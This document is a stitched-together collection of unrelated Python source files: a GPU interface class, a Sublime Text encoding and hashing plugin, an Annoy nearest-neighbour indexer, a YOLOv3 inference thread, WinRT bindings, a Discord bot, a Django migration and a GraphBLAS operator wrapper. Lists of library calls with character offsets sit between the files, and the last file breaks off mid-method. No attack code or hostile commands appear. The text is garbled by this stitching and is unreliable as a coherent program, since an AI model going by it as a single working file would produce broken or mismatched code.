class Gpu_interface(Peripherical_interface, metaclass=ABCMeta):
_vendor: str
_model: str
@property
def vendor(self) -> str:
return self._vendor
@vendor.setter
def vendor(self, value: str):
self._vendor = value
@property
def model(self) -> str:
return self._model
@model.setter
@abstractmethod
def model(self, value: str):
raise NotImplementedError
@property
def temp(self) -> float:
try:
self._temp = self.get_temp()
except NotImplementedError as e:
try:
raise e
finally:
e = None
del e
else:
return self._temp
@temp.setter
def temp(self, value: float):
self._temp = value
def __init__(self, os, vendor, model):
super().__init__(os)
self.vendor = vendor
self.model = model
@abstractmethod
def get_temp(self) -> float:
raise NotImplementedError
GpuType = TypeVar("GpuType", bound="Gpu_interface")
def get_gpuid(gpu_ids: Dict[str, str], gpus: List[GpuType]):
vendors = []
for i in range(len(gpus)):
if gpus[i].vendor not in vendors:
vendors.append(gpus[i].vendor)
gpuvendor = "".join(vendors).lower()
if gpuvendor in gpu_ids:
return gpu_ids[gpuvendor]
else:
print("Unknown GPU, contact us on github to resolve this.")
return "unknown"
|
[
"typing.TypeVar"
] |
[((1206, 1247), 'typing.TypeVar', 'TypeVar', (['"""GpuType"""'], {'bound': '"""Gpu_interface"""'}), "('GpuType', bound='Gpu_interface')\n", (1213, 1247), False, 'from typing import List, TypeVar, Dict\n')]
|
# -*- coding: utf-8 -*-
import base64
import hashlib
import sublime, sublime_plugin
import sys
PYTHON = sys.version_info[0]
if 3 == PYTHON:
# Python 3 and ST3
from urllib import parse
from . import codec_base62
from . import codec_base64
from . import codec_xml
from . import codec_json
from . import codec_quopri
from . import codec_hex
from . import codec_idn
else:
# Python 2 and ST2
import urllib
import codec_base62
import codec_base64
import codec_xml
import codec_json
import codec_quopri
import codec_hex
import codec_idn
SETTINGS_FILE = "Codec.sublime-settings"
"""
Pick up all the selections which are not empty.
If no selection, make all the text in return selection.
"""
def selected_regions(view):
sels = [sel for sel in view.sel() if not sel.empty()]
if not sels:
sels = [sublime.Region(0, view.size())]
else:
sels = view.sel()
return sels
"""
Sublime Text 3 Base64 Codec
Assumes UTF-8 encoding
日本語 encodes to base64 as 5pel5pys6Kqe
subjects?abcd encodes to url safe base64 as c3ViamVjdHM_YWJjZA==
>>> view.run_command('base64_encode', {'encode_type': 'b64encode'})
"""
class Base64EncodeCommand(sublime_plugin.TextCommand):
ENCODE_TYPE = {
'b64decode': codec_base64.b64decode,
'urlsafe_b64decode': base64.urlsafe_b64decode,
}
def run(self, edit, encode_type='b64encode'):
fix_base32_padding = sublime.load_settings(SETTINGS_FILE).get("base32_fix_padding", False)
print("Codec: fix base32 padding? %s" % str(fix_base32_padding))
fix_base64_padding = sublime.load_settings(SETTINGS_FILE).get("base64_fix_padding", False)
print("Codec: fix base64 padding? %s" % str(fix_base64_padding))
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
if 'b64encode' == encode_type:
encoded_string = base64.b64encode(original_string.encode("UTF-8"))
elif 'b64decode' == encode_type:
encoded_string = codec_base64.b64decode(original_string.encode("UTF-8"), add_padding=fix_base64_padding)
elif 'urlsafe_b64encode' == encode_type:
encoded_string = base64.urlsafe_b64encode(original_string.encode("UTF-8"))
elif 'urlsafe_b64decode' == encode_type:
encoded_string = codec_base64.urlsafe_b64decode(original_string.encode("UTF-8"), add_padding=fix_base64_padding)
elif 'b32encode' == encode_type:
encoded_string = base64.b32encode(original_string.encode("UTF-8"))
elif 'b32decode' == encode_type:
encoded_string = codec_base64.b32decode(original_string.encode("UTF-8"), add_padding=fix_base32_padding)
elif 'b16encode' == encode_type:
encoded_string = base64.b16encode(original_string.encode("UTF-8"))
elif 'b16decode' == encode_type:
encoded_string = base64.b16decode(original_string.encode("UTF-8"))
else:
print("unsupported operation %s" % (encode_type,))
break
# print("string encoded: " + str(encoded_string.decode("UTF-8")))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
"""
Sublime Text 3 URL Encoding (Percentage Encoding) Codec
ๆฅๆฌ่ช encodes to %E6%97%A5%E6%9C%AC%E8%AA%9E
"something with a space" encodes to "something%20with%20a%20space"
>>> view.run_command('url_encode', {'encode_type': 'quote'})
"""
class UrlEncodeCommand(sublime_plugin.TextCommand):
if 2 == PYTHON:
ENCODE_TYPE = {
'quote': urllib.quote,
'unquote': urllib.unquote,
'quote_plus': urllib.quote_plus,
'unquote_plus': urllib.unquote_plus
}
else:
ENCODE_TYPE = {
'quote': parse.quote,
'unquote': parse.unquote,
'quote_plus': parse.quote_plus,
'unquote_plus': parse.unquote_plus
}
def run(self, edit, encode_type='quote'):
safe_characters = str(sublime.load_settings(SETTINGS_FILE).get("url_encoding_safe", "/"))
print("Codec: safe url characters? %s" % str(safe_characters))
urlencode_method = UrlEncodeCommand.ENCODE_TYPE[encode_type]
# print("using url encode method: " + str(urlencode_method))
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string.encode("UTF-8"))
# print("string encoded: " + encoded_string)
if 2 == PYTHON:
try:
encoded_string = urlencode_method(original_string.encode("UTF-8"), safe=safe_characters)
except TypeError:
# FIXME - time to separate quote and unquote to avoid this kind of errors.
encoded_string = urlencode_method(original_string.encode("UTF-8"))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
else:
try:
encoded_string = urlencode_method(original_string, safe=safe_characters)
except TypeError:
# FIXME - time to separate quote and unquote to avoid this kind of errors.
encoded_string = urlencode_method(original_string)
self.view.replace(edit, region, encoded_string)
"""
Sublime Text 3 Secure Hash Codec
ๆฅๆฌ่ช hashes to SHA-256 as 77710aedc74ecfa33685e33a6c7df5cc83004da1bdcef7fb280f5c2b2e97e0a5
>>> view.run_command('secure_hash', {'secure_hash_type': 'sha256'})
"""
class SecureHashCommand(sublime_plugin.TextCommand):
SECURE_HASH_TYPE = {
'md5': 'md5',
'sha1': 'sha1',
'sha224': 'sha224',
'sha256': 'sha256',
'sha384': 'sha384',
'sha512': 'sha512'
}
def run(self, edit, secure_hash_type='sha256'):
secure_hash_type = SecureHashCommand.SECURE_HASH_TYPE[secure_hash_type]
# print("using secure hash algorithm: " + secure_hash_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
hash_obj = hashlib.new(secure_hash_type)
hash_obj.update(original_string.encode("UTF-8"))
encoded_string = hash_obj.hexdigest()
# print("string encoded: " + str(encoded_string))
self.view.replace(edit, region, str(encoded_string))
"""
Sublime Text 3 Secure Hash Codec
doSomething(); hashes to SHA-256 as RFWPLDbv2BY+rCkDzsE+0fr8ylGr2R2faWMhq4lfEQc=
>>> view.run_command('binary_secure_hash', {'secure_hash_type': 'sha256'})
"""
class BinarySecureHashCommand(sublime_plugin.TextCommand):
SECURE_HASH_TYPE = {
'sha256': 'sha256',
'sha384': 'sha384',
'sha512': 'sha512'
}
def run(self, edit, secure_hash_type='sha256'):
secure_hash_type = SecureHashCommand.SECURE_HASH_TYPE[secure_hash_type]
# print("using secure hash algorithm: " + secure_hash_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
hash_obj = hashlib.new(secure_hash_type)
hash_obj.update(original_string.encode("UTF-8"))
encoded_string = base64.b64encode(hash_obj.digest()).decode('UTF-8')
# print("string encoded: " + str(encoded_string))
self.view.replace(edit, region, str(encoded_string))
"""
Escapes and unescapes the 5 standard XML predefined entities
<hello>T'was a dark & "stormy" night</hello>
escapes to
<hello>T'was a dark & "stormy" night</hello>
>>> view.run_command('xml', {'encode_type': 'escape'})
"""
class XmlCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='escape'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'escape' == encode_type:
return codec_xml.escape
elif 'unescape' == encode_type:
return codec_xml.unescape
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes Quoted-Printable strings
This is a really long line to test whether "quoted-printable" works correctly when using ๆฅๆฌ่ช and ่ฑ่ช
encodes to
This is a really long line to test whether "quoted-printable" works correct=
ly when using =E6=97=A5=E6=9C=AC=E8=AA=9E and =E8=8B=B1=E8=AA=9E
>>> view.run_command('quoted_printable', {'encode_type': 'encode'})
"""
class QuotedPrintableCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
encoded_string = method(original_string.encode("UTF-8"))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_quopri.encodestring
elif 'decode' == encode_type:
return codec_quopri.decodestring
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes JSON
T'was a dark & "stormy" night in ๆฅๆฌ
encodes to
"T'was a dark & \"stormy\" night in ๆฅๆฌ"
>>> view.run_command('json', {'encode_type': 'encode'})
"""
class JsonCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_json.encode
elif 'encode_ensure_ascii' == encode_type:
return codec_json.encode_ensure_ascii
elif 'decode' == encode_type:
return codec_json.decode
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes C-style hex representations of bytes
Hello, my good friend
encodes to
\\x48\\x65\\x6c\\x6c\\x6f\\x2c\\x20\\x6d\\x79\\x20\\x67\\x6f\\x6f\\x64\\x20\\x66\\x72\\x69\\x65\\x6e\\x64\\x21
>>> view.run_command('c_hex', {'encode_type': 'encode'})
"""
class HexCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_hex.encode_hex
elif 'decode' == encode_type:
return codec_hex.decode_hex
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
class IdnCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='punycode_encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'punycode_encode' == encode_type:
return codec_idn.punycode_encode
elif 'punycode_decode' == encode_type:
return codec_idn.punycode_decode
elif 'idna_encode' == encode_type:
return codec_idn.idna_encode
elif 'idna_decode' == encode_type:
return codec_idn.idna_decode
elif 'idna2008_encode' == encode_type:
return codec_idn.idna2008_encode
elif 'idna2008_decode' == encode_type:
return codec_idn.idna2008_decode
elif 'idna2008uts46_encode' == encode_type:
return codec_idn.idna2008uts46_encode
elif 'idna2008uts46_decode' == encode_type:
return codec_idn.idna2008uts46_decode
elif 'idna2008transitional_encode' == encode_type:
return codec_idn.idna2008transitional_encode
elif 'idna2008transitional_decode' == encode_type:
return codec_idn.idna2008transitional_decode
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Sublime Text 3 Base62 Codec
"""
class Base62EncodeCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='b62encode'):
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
if 'b62encode_int' == encode_type:
encoded_string = codec_base62.b62encode_int(original_string.encode("UTF-8"))
elif 'b62decode_int' == encode_type:
encoded_string = codec_base62.b62decode_int(original_string.encode("UTF-8"))
elif 'b62encode_inv_int' == encode_type:
encoded_string = codec_base62.b62encode_inv_int(original_string.encode("UTF-8"))
elif 'b62decode_inv_int' == encode_type:
encoded_string = codec_base62.b62decode_inv_int(original_string.encode("UTF-8"))
elif 'b62encode_hex' == encode_type:
encoded_string = codec_base62.b62encode_hex(original_string.encode("UTF-8"))
elif 'b62decode_hex' == encode_type:
encoded_string = codec_base62.b62decode_hex(original_string.encode("UTF-8"))
elif 'b62encode_inv_hex' == encode_type:
encoded_string = codec_base62.b62encode_inv_hex(original_string.encode("UTF-8"))
elif 'b62decode_inv_hex' == encode_type:
encoded_string = codec_base62.b62decode_inv_hex(original_string.encode("UTF-8"))
else:
print("unsupported operation %s" % (encode_type,))
break
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
|
[
"sublime.load_settings",
"hashlib.new"
] |
[((1462, 1498), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (1483, 1498), False, 'import sublime, sublime_plugin\n'), ((1634, 1670), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (1655, 1670), False, 'import sublime, sublime_plugin\n'), ((6644, 6673), 'hashlib.new', 'hashlib.new', (['secure_hash_type'], {}), '(secure_hash_type)\n', (6655, 6673), False, 'import hashlib\n'), ((7732, 7761), 'hashlib.new', 'hashlib.new', (['secure_hash_type'], {}), '(secure_hash_type)\n', (7743, 7761), False, 'import hashlib\n'), ((4309, 4345), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (4330, 4345), False, 'import sublime, sublime_plugin\n')]
|
from interfaces.ANNIndexer import ANNIndexer
import annoy
# Usage : indexer = AnnoyIndexer(vector_length=100, n_trees=1000)
class AnnoyIndexer(ANNIndexer):
def __init__(self, content_vectors, vector_length=100, n_trees=10):
print("initializing annoy wrapper")
self.vector_length = vector_length
self.n_trees = n_trees
self.index = annoy.AnnoyIndex(vector_length)
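        # NOTE: newer annoy releases expect an explicit metric, e.g.
        # annoy.AnnoyIndex(vector_length, "angular"); relying on the implicit default is deprecated.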
self.content_vectors = content_vectors
def build_index(self, path=None):
print("building index")
print("len of docvecs", self.content_vectors.size())
vectors_map = self.content_vectors.get_vectors_map()
for key in vectors_map:
try:
self.index.add_item(key, vectors_map[key])
except Exception as e:
print("problem adding to index for id : " + str(key), e)
# vectors.apply(lambda df_item: self.index.add_item(df_item.name, df_item['vector']))
print(self.index.build(self.n_trees))
print("items in index - ", self.index.get_n_items())
def save(self, path):
self.index.save(path)
def load(self, path):
self.index.load(path)
def find_NN_by_id(self, query_id, n=10):
return self.index.get_nns_by_item(query_id, n)
def find_NN_by_vector(self, query_vector, n=10):
return self.index.get_nns_by_vector(query_vector, n)
|
[
"annoy.AnnoyIndex"
] |
[((351, 382), 'annoy.AnnoyIndex', 'annoy.AnnoyIndex', (['vector_length'], {}), '(vector_length)\n', (367, 382), False, 'import annoy\n')]
|
import time
import threading
import numpy as np
from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors
from yolo_utils import yolo_eval
from priority_queue import PriorityQueue
class YOLOv3Thread(threading.Thread):
def __init__(self, runner: "Runner", deque_input, lock_input,
deque_output, lock_output, thread_name):
super(YOLOv3Thread, self).__init__(name=thread_name)
self.runner = runner
self.deque_input = deque_input
self.lock_input = lock_input
self.deque_output = deque_output
self.lock_output = lock_output
self.class_names = load_classes('./model_data/adas_classes.txt')
self.colors = generate_colors(self.class_names)
def set_input_image(self, input_run, frame, size):
w, h = size
img = preprocess_one_image_fn(frame, w, h)
input_run[0, ...] = img.reshape((h, w, 3))
def run(self):
# Get input/output tensors and dims
inputTensors = self.runner.get_input_tensors()
outputTensors = self.runner.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims) # (1, 256, 512, 3)
result0_ndim = tuple(outputTensors[0].dims) # (1, 8, 16, 40)
result1_ndim = tuple(outputTensors[1].dims) # (1, 16, 32, 40)
result2_ndim = tuple(outputTensors[2].dims) # (1, 32, 64, 40)
        result3_ndim = tuple(outputTensors[3].dims) # (1, 64, 128, 40)
# input/output data define
input_data = [np.empty(input_ndim, dtype=np.float32, order="C")]
result0 = np.empty(result0_ndim, dtype=np.float32, order="C")
result1 = np.empty(result1_ndim, dtype=np.float32, order="C")
result2 = np.empty(result2_ndim, dtype=np.float32, order="C")
result3 = np.empty(result3_ndim, dtype=np.float32, order="C")
results = [result0, result1, result2, result3]
# get input width, height for preprocess
input_shape = (input_ndim[2], input_ndim[1])
while True:
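            # consumer loop: pop the oldest frame from the input deque, run DPU
            # inference on it, and push the post-processed result to the output deque in frame order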
self.lock_input.acquire()
            # if the input deque is empty, release the lock and retry
if not self.deque_input:
self.lock_input.release()
continue
else:
# get input frame from input frames queue
data_from_deque = self.deque_input[0]
self.deque_input.popleft()
self.lock_input.release()
# Init input image to input buffers
img = data_from_deque['img']
idx = data_from_deque['idx']
start_time = data_from_deque['time']
self.set_input_image(input_data[0], img, input_shape)
# invoke the running of DPU for yolov3
"""Benchmark DPU FPS performance over Vitis AI APIs `execute_async()` and `wait()`"""
# (self: vart.Runner, arg0: List[buffer], arg1: List[buffer]) -> Tuple[int, int]
job_id = self.runner.execute_async(input_data, results)
self.runner.wait(job_id)
self.post_process(img, results, input_shape)
self.lock_output.acquire()
img_info = PriorityQueue(idx, img, start_time)
self.deque_output.append(img_info)
self.deque_output.sort()
self.lock_output.release()
def post_process(self, image, results, input_ndim):
"""Xilinx ADAS detction model: YOLOv3
Name: yolov3_adas_pruned_0_9
Input shape: (256, 512, 3)
Classe: 3
Anchor: 5, for detail please see `yolo_utils.py`
Outputs: 4
outputs_node: {
"layer81_conv",
"layer93_conv",
"layer105_conv",
"layer117_conv",
}
"""
image_shape = (image.shape[1], image.shape[0]) # (w, h)
scores, boxes, classes = yolo_eval(
results,
image_shape=image_shape,
input_ndim=input_ndim,
classes=3,
score_threshold=0.5,
iou_threshold=0.7)
# print("detection:")
# for i in range(scores.shape[0]):
# print("\t{}, {}, {}".format(
# self.class_names[int(classes[i])], scores[i], boxes[i]
# ))
image = draw_outputs(image, (scores, boxes, classes),
self.class_names, self.colors)
|
[
"common.preprocess_one_image_fn",
"common.draw_outputs",
"yolo_utils.yolo_eval",
"priority_queue.PriorityQueue",
"numpy.empty",
"common.generate_colors",
"common.load_classes"
] |
[((651, 696), 'common.load_classes', 'load_classes', (['"""./model_data/adas_classes.txt"""'], {}), "('./model_data/adas_classes.txt')\n", (663, 696), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((719, 752), 'common.generate_colors', 'generate_colors', (['self.class_names'], {}), '(self.class_names)\n', (734, 752), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((843, 879), 'common.preprocess_one_image_fn', 'preprocess_one_image_fn', (['frame', 'w', 'h'], {}), '(frame, w, h)\n', (866, 879), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((1587, 1638), 'numpy.empty', 'np.empty', (['result0_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result0_ndim, dtype=np.float32, order='C')\n", (1595, 1638), True, 'import numpy as np\n'), ((1657, 1708), 'numpy.empty', 'np.empty', (['result1_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result1_ndim, dtype=np.float32, order='C')\n", (1665, 1708), True, 'import numpy as np\n'), ((1727, 1778), 'numpy.empty', 'np.empty', (['result2_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result2_ndim, dtype=np.float32, order='C')\n", (1735, 1778), True, 'import numpy as np\n'), ((1797, 1848), 'numpy.empty', 'np.empty', (['result3_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result3_ndim, dtype=np.float32, order='C')\n", (1805, 1848), True, 'import numpy as np\n'), ((3831, 3953), 'yolo_utils.yolo_eval', 'yolo_eval', (['results'], {'image_shape': 'image_shape', 'input_ndim': 'input_ndim', 'classes': '(3)', 'score_threshold': '(0.5)', 'iou_threshold': '(0.7)'}), '(results, image_shape=image_shape, input_ndim=input_ndim, classes=\n 3, score_threshold=0.5, iou_threshold=0.7)\n', (3840, 3953), False, 'from yolo_utils import yolo_eval\n'), ((4246, 4322), 'common.draw_outputs', 'draw_outputs', (['image', '(scores, boxes, classes)', 'self.class_names', 'self.colors'], {}), '(image, (scores, boxes, classes), self.class_names, self.colors)\n', (4258, 4322), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((1518, 1567), 'numpy.empty', 'np.empty', (['input_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(input_ndim, dtype=np.float32, order='C')\n", (1526, 1567), True, 'import numpy as np\n'), ((3120, 3155), 'priority_queue.PriorityQueue', 'PriorityQueue', (['idx', 'img', 'start_time'], {}), '(idx, img, start_time)\n', (3133, 3155), False, 'from priority_queue import PriorityQueue\n')]
|
# WARNING: Please don't edit this file. It was generated by Python/WinRT v1.0.0-beta.4
import enum
import winsdk
_ns_module = winsdk._import_ns_module("Windows.Web.UI")
try:
import winsdk.windows.applicationmodel.datatransfer
except Exception:
pass
try:
import winsdk.windows.foundation
except Exception:
pass
try:
import winsdk.windows.foundation.collections
except Exception:
pass
try:
import winsdk.windows.storage.streams
except Exception:
pass
try:
import winsdk.windows.ui
except Exception:
pass
try:
import winsdk.windows.web
except Exception:
pass
try:
import winsdk.windows.web.http
except Exception:
pass
class WebViewControlPermissionState(enum.IntEnum):
UNKNOWN = 0
DEFER = 1
ALLOW = 2
DENY = 3
class WebViewControlPermissionType(enum.IntEnum):
GEOLOCATION = 0
UNLIMITED_INDEXED_D_B_QUOTA = 1
MEDIA = 2
POINTER_LOCK = 3
WEB_NOTIFICATIONS = 4
SCREEN = 5
IMMERSIVE_VIEW = 6
WebViewControlContentLoadingEventArgs = _ns_module.WebViewControlContentLoadingEventArgs
WebViewControlDOMContentLoadedEventArgs = _ns_module.WebViewControlDOMContentLoadedEventArgs
WebViewControlDeferredPermissionRequest = _ns_module.WebViewControlDeferredPermissionRequest
WebViewControlLongRunningScriptDetectedEventArgs = _ns_module.WebViewControlLongRunningScriptDetectedEventArgs
WebViewControlNavigationCompletedEventArgs = _ns_module.WebViewControlNavigationCompletedEventArgs
WebViewControlNavigationStartingEventArgs = _ns_module.WebViewControlNavigationStartingEventArgs
WebViewControlNewWindowRequestedEventArgs = _ns_module.WebViewControlNewWindowRequestedEventArgs
WebViewControlPermissionRequest = _ns_module.WebViewControlPermissionRequest
WebViewControlPermissionRequestedEventArgs = _ns_module.WebViewControlPermissionRequestedEventArgs
WebViewControlScriptNotifyEventArgs = _ns_module.WebViewControlScriptNotifyEventArgs
WebViewControlSettings = _ns_module.WebViewControlSettings
WebViewControlUnsupportedUriSchemeIdentifiedEventArgs = _ns_module.WebViewControlUnsupportedUriSchemeIdentifiedEventArgs
WebViewControlUnviewableContentIdentifiedEventArgs = _ns_module.WebViewControlUnviewableContentIdentifiedEventArgs
WebViewControlWebResourceRequestedEventArgs = _ns_module.WebViewControlWebResourceRequestedEventArgs
IWebViewControl = _ns_module.IWebViewControl
IWebViewControl2 = _ns_module.IWebViewControl2
|
[
"winsdk._import_ns_module"
] |
[((129, 171), 'winsdk._import_ns_module', 'winsdk._import_ns_module', (['"""Windows.Web.UI"""'], {}), "('Windows.Web.UI')\n", (153, 171), False, 'import winsdk\n')]
|
import discord
from discord.ext import commands
import json
import glob
import time
import os
import motor.motor_asyncio as motor
import logging
import sys
from cogs.utils.guild_features import GuildFeatures
class Schezo(commands.Bot):
__slots__ = 'config', 'start_time', '_cogs_loaded', 'db_client', 'db', 'logger', 'gf'
def __init__(self):
if not os.path.exists('bot_config.json'):
raise FileNotFoundError('Could not find "bot_config.json". Make sure to copy and rename the template and then change the values.')
with open('bot_config.json', 'r', encoding='utf-8') as file:
self.config = json.load(file)
intents = discord.Intents(
# These are both true for s.played
# although that command might be removed entirely in the future
presences=True,
members=True,
reactions=True,
messages=True,
guilds=True,
typing=False,
invites=False,
webhooks=False,
integrations=False,
emojis=False,
bans=False,
voice_states=False,
)
super().__init__(command_prefix=self.config['prefix'], intents=intents)
self.start_time = time.time()
self._cogs_loaded = False
self.db_client = motor.AsyncIOMotorClient('localhost', 27017, retryWrites=self.config.get('retrywrites', True))
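        # "retrywrites" is configurable because retryable writes are not supported
        # on standalone MongoDB deployments.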
self.db = self.db_client[self.config['dbname']]
self.gf: GuildFeatures = GuildFeatures(self.db)
self.logger = logging.getLogger('schezo')
formatter = logging.Formatter('[{asctime} {levelname}] {message}', datefmt='%d/%m/%Y %H:%M', style='{')
file_handler = logging.FileHandler('schezo.log', mode='w')
file_handler.setFormatter(formatter)
self.logger.setLevel(logging.INFO)
self.logger.addHandler(file_handler)
self.logger.propagate = False
@property
def uptime(self):
return time.time() - self.start_time
async def on_ready(self):
msg = f'Logged in as {self.user}'
print(msg)
self.logger.info(msg)
game = discord.Activity(name=self.config['game'], type=discord.ActivityType.watching)
await self.change_presence(activity=game)
self.load_cogs()
def get_cogs(self):
files = glob.glob('cogs/*.py')
# Replace / or \ with . and remove .py at the end
return map(lambda p: p.replace('\\','.').replace('/','.')[:-3], files)
def load_cogs(self):
if self._cogs_loaded: return
self._cogs_loaded = True
for cog in self.get_cogs():
self.load_extension(cog)
def unload_cogs(self):
self._cogs_loaded = False
extensions = tuple(self.extensions.keys())
for cog in extensions:
self.unload_extension(cog)
def run(self):
super().run(self.config['token'])
bot = Schezo()
@bot.command(hidden=True, aliases=['rc'])
@commands.is_owner()
async def reloadcogs(ctx):
ctx.bot.unload_cogs()
modules = tuple(sys.modules.keys())
for name in modules:
if name.startswith('cogs.utils'):
del sys.modules[name]
ctx.bot.load_cogs()
try:
await ctx.message.add_reaction('๐')
except discord.DiscordException:
pass
bot.run()
|
[
"discord.Activity",
"json.load",
"logging.FileHandler",
"sys.modules.keys",
"os.path.exists",
"time.time",
"logging.Formatter",
"discord.Intents",
"glob.glob",
"cogs.utils.guild_features.GuildFeatures",
"discord.ext.commands.is_owner",
"logging.getLogger"
] |
[((3002, 3021), 'discord.ext.commands.is_owner', 'commands.is_owner', ([], {}), '()\n', (3019, 3021), False, 'from discord.ext import commands\n'), ((682, 891), 'discord.Intents', 'discord.Intents', ([], {'presences': '(True)', 'members': '(True)', 'reactions': '(True)', 'messages': '(True)', 'guilds': '(True)', 'typing': '(False)', 'invites': '(False)', 'webhooks': '(False)', 'integrations': '(False)', 'emojis': '(False)', 'bans': '(False)', 'voice_states': '(False)'}), '(presences=True, members=True, reactions=True, messages=True,\n guilds=True, typing=False, invites=False, webhooks=False, integrations=\n False, emojis=False, bans=False, voice_states=False)\n', (697, 891), False, 'import discord\n'), ((1273, 1284), 'time.time', 'time.time', ([], {}), '()\n', (1282, 1284), False, 'import time\n'), ((1529, 1551), 'cogs.utils.guild_features.GuildFeatures', 'GuildFeatures', (['self.db'], {}), '(self.db)\n', (1542, 1551), False, 'from cogs.utils.guild_features import GuildFeatures\n'), ((1575, 1602), 'logging.getLogger', 'logging.getLogger', (['"""schezo"""'], {}), "('schezo')\n", (1592, 1602), False, 'import logging\n'), ((1623, 1719), 'logging.Formatter', 'logging.Formatter', (['"""[{asctime} {levelname}] {message}"""'], {'datefmt': '"""%d/%m/%Y %H:%M"""', 'style': '"""{"""'}), "('[{asctime} {levelname}] {message}', datefmt=\n '%d/%m/%Y %H:%M', style='{')\n", (1640, 1719), False, 'import logging\n'), ((1738, 1781), 'logging.FileHandler', 'logging.FileHandler', (['"""schezo.log"""'], {'mode': '"""w"""'}), "('schezo.log', mode='w')\n", (1757, 1781), False, 'import logging\n'), ((2173, 2251), 'discord.Activity', 'discord.Activity', ([], {'name': "self.config['game']", 'type': 'discord.ActivityType.watching'}), "(name=self.config['game'], type=discord.ActivityType.watching)\n", (2189, 2251), False, 'import discord\n'), ((2368, 2390), 'glob.glob', 'glob.glob', (['"""cogs/*.py"""'], {}), "('cogs/*.py')\n", (2377, 2390), False, 'import glob\n'), ((3095, 3113), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (3111, 3113), False, 'import sys\n'), ((366, 399), 'os.path.exists', 'os.path.exists', (['"""bot_config.json"""'], {}), "('bot_config.json')\n", (380, 399), False, 'import os\n'), ((639, 654), 'json.load', 'json.load', (['file'], {}), '(file)\n', (648, 654), False, 'import json\n'), ((2006, 2017), 'time.time', 'time.time', ([], {}), '()\n', (2015, 2017), False, 'import time\n')]
|
# Generated by Django 3.0.7 on 2020-07-04 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('photologue', '0012_auto_20200704_0747'),
]
operations = [
migrations.AddField(
model_name='photo',
name='source',
field=models.TextField(blank=True, verbose_name='source'),
),
]
|
[
"django.db.models.TextField"
] |
[((336, 387), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""source"""'}), "(blank=True, verbose_name='source')\n", (352, 387), False, 'from django.db import migrations, models\n')]
|
"""Contains all automatically generated BinaryOps from CFFI.
"""
__all__ = [
"BinaryOp",
"Accum",
"current_binop",
"current_accum",
"binary_op",
]
import sys
import re
import contextvars
from itertools import chain
from collections import defaultdict
from functools import partial
import numba
from .base import lib, ffi, _check
from . import types
current_accum = contextvars.ContextVar("current_accum")
current_binop = contextvars.ContextVar("current_binop")
class BinaryOp:
"""Wrapper around GrB_BinaryOp."""
def __init__(self, op, typ, binaryop, udt=None, boolean=False):
if udt is not None: # pragma: no cover
o = ffi.new("GrB_BinaryOp*")
udt = udt._gb_type
lib.GrB_BinaryOp_new(
o,
ffi.cast("GxB_binary_function", binaryop.address),
lib.GrB_BOOL if boolean else udt,
udt,
udt,
)
self.binaryop = o[0]
else:
self.binaryop = binaryop
cls = getattr(types, typ)
setattr(cls, op, self)
setattr(cls, op.lower(), self)
self.name = "_".join((op, typ))
self.__doc__ = self.name
self.token = None
def __enter__(self):
self.token = current_binop.set(self)
return self
def __exit__(self, *errors): # pragma: nocover
